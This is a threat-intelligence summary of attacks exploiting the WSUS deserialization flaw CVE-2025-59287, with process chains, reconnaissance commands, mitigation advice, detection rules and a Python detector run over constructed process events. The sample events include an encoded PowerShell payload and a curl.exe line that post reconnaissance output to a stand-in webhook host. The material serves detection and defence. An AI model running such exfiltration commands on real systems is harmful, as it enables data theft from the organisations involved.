A recent campaign was observed in which threat actors actively exploited a Microsoft WSUS (Windows Server Update Services) vulnerability, CVE-2025-59287, across multiple organizations starting around October 23, 2025. The attackers targeted WSUS instances publicly exposed on the default ports 8530/TCP and 8531/TCP, exploiting a deserialization vulnerability in the AuthorizationCookie. Exploitation involved sending specially crafted POST requests to the WSUS web services, which resulted in remote code execution. During the attacks, malicious processes were spawned from the HTTP worker process (w3wp.exe) and the WSUS service binary, producing process chains such as wsusservice.exe → cmd.exe → cmd.exe → powershell.exe and w3wp.exe → cmd.exe → cmd.exe → powershell.exe.
The attackers executed base64-encoded PowerShell payloads that performed reconnaissance activities on compromised servers, including enumerating network and user information through commands like "net user /domain" and "ipconfig /all". The collected data was then exfiltrated to remote webhook URLs using both PowerShell's Invoke-WebRequest and curl.exe. The threat actors employed proxy networks to conduct and obfuscate their exploitation activities. Microsoft released an out-of-band security update to address this vulnerability, and organizations are strongly advised to apply the patch immediately and restrict internet access to WSUS infrastructure by blocking inbound traffic to TCP ports 8530 and 8531 except for explicitly required sources.
Detections
- Suspicious Child Process from Windows Update Service
- PowerShell Possible Exfiltration to External Webhook
- WSUS Suspicious Web Request from External IP
- Detect traffic routing through multiple proxy hops or anonymization networks
- Monitor public-facing services for exploitation patterns — unusual POST bodies, deserialization payloads
- Flag suspicious PowerShell execution — encoded commands, download cradles, or AMSI bypass
- Flag outbound data transfers to webhook endpoints from servers or CI runners
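As an added example, not code from the original report, the following Python applies the first two detections above and the webhook rule to constructed Sysmon-style process-creation events that mirror the described chain (wsusservice.exe → cmd.exe → cmd.exe → powershell.exe), decoding the -EncodedCommand payload to find the hidden Invoke-WebRequest. All paths, PIDs and the webhook host are hypothetical sample values.

```python
import base64
import ntpath
import re
# Added example (not the report's code): detection rules over constructed Sysmon-style events; paths, PIDs and webhook host are hypothetical.
WSUS_ROOTS = {"wsusservice.exe", "w3wp.exe"}
ENCODED_RE = re.compile(r"\s-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
WEBHOOK_RE = re.compile(r"https?://[^\s'\"]*(?:webhook|hooks\.)[^\s'\"]*", re.I)

def encode_ps(script):  # PowerShell -EncodedCommand format: UTF-16LE text, base64-encoded
    return base64.b64encode(script.encode("utf-16-le")).decode()

ENC = encode_ps("$o = net user /domain; ipconfig /all; "
                "Invoke-WebRequest -Uri https://webhook.example/abc -Method POST -Body $o")
EVENTS = [  # constructed (pid, ppid, image, command line); rows 100-500 mirror the chain described above
    (100, 4, r"C:\Program Files\Update Services\Service\WsusService.exe", "WsusService.exe"),
    (200, 100, r"C:\Windows\System32\cmd.exe", "cmd.exe /c cmd.exe /c powershell -enc " + ENC),
    (300, 200, r"C:\Windows\System32\cmd.exe", "cmd.exe /c powershell -enc " + ENC),
    (400, 300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell -NoP -W Hidden -enc " + ENC),
    (500, 300, r"C:\Windows\System32\curl.exe", "curl.exe -X POST -d @out.txt https://webhook.example/abc"),
    (600, 4, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell -File C:\\ops\\maint.ps1"),
]

def ancestors(by_pid, pid):  # image basenames of pid's ancestors, nearest parent first (cycle-safe)
    names, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        pid = by_pid[pid][1]
        names += [ntpath.basename(by_pid[pid][2]).lower()] if pid in by_pid else []
    return names

def decoded_payload(cmdline):  # script hidden in an -EncodedCommand argument, or '' if none or invalid
    m = ENCODED_RE.search(cmdline)
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le") if m else ""
    except (ValueError, UnicodeDecodeError):
        return ""

def find_suspicious(events):  # pid -> reasons, for every event that trips one of the rules
    by_pid = {e[0]: e for e in events}
    hits = {}
    for pid, _ppid, image, cmdline in events:
        name = ntpath.basename(image).lower()
        reasons = [label for hit, label in (
            (WSUS_ROOTS & set(ancestors(by_pid, pid)), "spawned under WSUS service or its IIS worker"),
            (name.startswith("powershell") and ENCODED_RE.search(cmdline), "encoded PowerShell command"),
            (WEBHOOK_RE.search(cmdline + " " + decoded_payload(cmdline)), "outbound transfer to webhook"),
        ) if hit]
        if reasons:
            hits[pid] = reasons
    return hits
```

Running `find_suspicious(EVENTS)` flags the whole WSUS-rooted chain (PIDs 200, 300, 400, 500) while leaving the service itself and the benign PowerShell under PID 600 untouched.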